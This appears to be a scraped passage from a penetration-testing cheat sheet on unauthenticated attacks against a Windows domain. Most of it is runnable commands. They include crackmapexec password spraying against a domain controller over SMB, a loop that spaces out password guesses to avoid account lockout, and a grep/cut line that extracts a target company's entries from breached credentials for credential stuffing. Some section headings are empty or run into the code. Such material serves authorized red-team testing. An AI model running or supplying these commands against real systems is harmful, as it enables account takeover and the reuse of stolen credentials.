Non-Authenticated (External) Attacks
Password Spraying
Password Spraying Execution
# SMB password spraying with delay
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success
# Multiple password attempts with lockout consideration
for password in "Password123!" "Welcome2024!" "Company123!"; do
crackmapexec smb <DC-IP> -u users.txt -p "$password" --continue-on-success
sleep 1800 # 30-minute delay between password attempts
doneCredential Stuffing
Credential Preparation
# Process breach data for domain-specific attempts
grep "@<company>.com" breached_creds.txt | cut -d: -f1,2 > domain_creds.txtCredential Stuffing Execution
Brute Force Attacks
Targeted Brute Force
Last updated
Was this helpful?